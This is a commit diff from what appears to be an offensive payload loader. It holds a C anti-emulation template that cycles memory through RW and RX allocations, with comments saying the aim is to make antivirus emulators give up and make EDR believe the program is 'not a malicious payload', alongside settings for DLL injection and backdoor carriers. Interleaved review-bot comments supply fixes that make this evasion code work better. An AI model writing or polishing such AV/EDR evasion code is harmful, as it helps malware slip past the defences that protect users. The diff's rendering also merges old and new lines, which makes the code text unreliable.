refactor: improve sirallocalot

This commit is contained in:
Dobin
2024-07-07 12:36:15 +01:00
parent b868c29c7d
commit 4bed8d1a95
4 changed files with 38 additions and 35 deletions
+21 -28
@@ -1,28 +1,31 @@
#define SIR_ITERATION_COUNT {{SIR_ITERATION_COUNT}}
#define SIR_ALLOC_COUNT {{SIR_ALLOC_COUNT}}
#define SIR_SLEEP_TIME 200 // ms
/* This will allocate SIR_ALLOC_COUNT RW memory regions, /* This will allocate SIR_ALLOC_COUNT RW memory regions,
set them to RX, and free them set them to RX, and free them.
And this SIR_ITERATION_COUNT times.
The idea is that the AV emulator will probably give up, either because SIR_ITERATION_COUNT: Single digits, around 5
of used memory is above maximum, or amount of instructions, or SIR_ALLOC_COUNT: Tripple digits, around 100
number of API calls, or time.
It hopefully also makes the EDR think this program is doing some Memory : SIR_ALLOC_COUNT * payload_length
kind of interpreter or JIT compilation, and not a malicious payload. Cycles : SIR_ALLOC_COUNT * payload_length * SIR_ITERATION_COUNT
Time : SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * payload_length * ?
API calls: SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * 3
The idea is that the AV emulator will probably give up, either because
of used memory is above maximum, or amount of instructions, or
number of API calls, or time.
It hopefully also makes the EDR think this program is doing some
kind of interpreter or JIT compilation, and not a malicious payload.
*/ */
void antiemulation() { void antiemulation() {
void* allocs[SIR_ALLOC_COUNT]; void* allocs[{{SIR_ALLOC_COUNT}}];
DWORD result; DWORD result;
for(int i=0; i<SIR_ITERATION_COUNT; i++) { for(int i=0; i<{{SIR_ITERATION_COUNT}}; i++) {
for(int n=0; n<SIR_ALLOC_COUNT; n++) { for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
allocs[n] = VirtualAlloc( allocs[n] = VirtualAlloc(
NULL, NULL,
{{PAYLOAD_LEN}}, {{PAYLOAD_LEN}},
@@ -37,33 +40,23 @@ void antiemulation() {
} }
} }
// Write something. for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
/*for(int n=0; n<SIR_ALLOC_COUNT; n++) {
char *alloc = allocs[n];
alloc[0] = 0; // overwrite the first byte
}*/
for(int n=0; n<SIR_ALLOC_COUNT; n++) {
if (VirtualProtect( if (VirtualProtect(
allocs[n], allocs[n],
{{PAYLOAD_LEN}}, {{PAYLOAD_LEN}},
p_RX, p_RX,
&result) == 0) &result) == 0)
{ {
return 7; return;
} }
} }
Sleep(SIR_SLEEP_TIME);
BOOL bSuccess; BOOL bSuccess;
for(int n=0; n<SIR_ALLOC_COUNT; n++) { for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
bSuccess = VirtualFree( bSuccess = VirtualFree(
allocs[n], allocs[n],
{{PAYLOAD_LEN}}, {{PAYLOAD_LEN}},
0x00008000); // MEM_RELEASE 0x00008000); // MEM_RELEASE
} }
} }
} }
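Review bot: In the second hunk the early `return;` on a VirtualProtect failure leaves every region allocated earlier in that iteration mapped, and `bSuccess` from VirtualFree is assigned but never read, so a failing release is silent as well. VirtualFree with MEM_RELEASE (0x00008000) requires dwSize to be 0 per the Win32 documentation, so passing `{{PAYLOAD_LEN}}` there is expected to make the call fail, which the unchecked result hides; the failure path should break out to the release loop and the free result should be checked, as below. The comment block in the first hunk still speaks of SIR_ITERATION_COUNT and SIR_ALLOC_COUNT although the `#define`s were removed and the values are now inlined as template variables, so the names it documents no longer exist in the generated code. antiemulation() begins in the first hunk, outside the one reviewed here.
```c
        BOOL failed = FALSE;
        for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
            if (VirtualProtect(allocs[n], {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
                failed = TRUE; // release what was allocated instead of returning with it mapped
                break;
            }
        }
        for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
            // MEM_RELEASE requires dwSize == 0; check the result instead of discarding it
            if (VirtualFree(allocs[n], 0, 0x00008000) == 0) {
                failed = TRUE;
            }
        }
        if (failed) {
            return;
        }
```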
@@ -22,6 +22,8 @@ char *supermega_payload;
{{plugin_executionguardrail}} {{plugin_executionguardrail}}
{{plugin_virtualprotect}}
int main() int main()
{ {
+4
@@ -23,6 +23,10 @@ class Settings():
self.dllfunc: str = "" # For DLL injection self.dllfunc: str = "" # For DLL injection
# Anti-debugging
self.sir_iteration_count: int = 5
self.sir_alloc_count: int = 100
# Injectable # Injectable
self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr
self.inject_exe_in: FilePath = "" self.inject_exe_in: FilePath = ""
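Review bot: The comment introduced above the two new fields reads `# Anti-debugging`, but `sir_iteration_count` and `sir_alloc_count` are consumed by the antiemulation template in create_c_from_template, so the label misdescribes them; `# Anti-emulation (sirallocalot)` would match their use. A one-line note on the accepted range would also help, since the renderer only clamps the upper bound (256) and nothing rejects 0 or negative values, which would render as a zero- or negative-sized C array. The Settings class body continues outside the hunk.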
+11 -7
@@ -60,15 +60,19 @@ def create_c_from_template(settings: Settings, payload_len: int):
filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format( filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format(
settings.plugin_antiemulation) settings.plugin_antiemulation)
with open(filepath_antiemulation, "r", encoding='utf-8') as file: with open(filepath_antiemulation, "r", encoding='utf-8') as file:
sir_iteration_count = 5 sir_iteration_count = settings.sir_iteration_count
sir_alloc_count = (int(config.get("sir_target_mem")) / payload_len)+1 sir_alloc_count = settings.sir_alloc_count
# if too large, compiler will add a __checkstk dependency # sir_alloc_count = int((int(config.get("sir_target_mem")) / payload_len))+1
if sir_alloc_count > 256: max_alloc_count = 256
sir_alloc_count = 256 if sir_alloc_count > max_alloc_count:
logging.info(" AntiEmulation target: iterations: {} alloc: {}".format( # if too large, compiler will add a __checkstk dependency
logging.warning("Too large sir allocation count {}, setting to max {}".format(
sir_alloc_count, max_alloc_count
))
sir_alloc_count = max_alloc_count
logging.info("> AntiEmulation: iterations: {} allocs: {}".format(
sir_iteration_count, sir_alloc_count) sir_iteration_count, sir_alloc_count)
) )
plugin_antiemualation = file.read() plugin_antiemualation = file.read()
plugin_antiemualation = Template(plugin_antiemualation).render({ plugin_antiemualation = Template(plugin_antiemualation).render({
'PAYLOAD_LEN': payload_len, 'PAYLOAD_LEN': payload_len,
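Review bot: `sir_alloc_count` and `sir_iteration_count` are now taken straight from settings with only an upper clamp, so a value of 0 or below passes through and renders as `void* allocs[0]` with empty loops in the C template; add a lower-bound check beside the max clamp, e.g. `if sir_alloc_count < 1 or sir_iteration_count < 1: raise ValueError("sir_alloc_count and sir_iteration_count must be >= 1")`. The commented-out `# sir_alloc_count = int((int(config.get("sir_target_mem")) / payload_len))+1` line is dead code now that the value comes from settings and should be dropped rather than kept as a comment. create_c_from_template continues beyond the hunk.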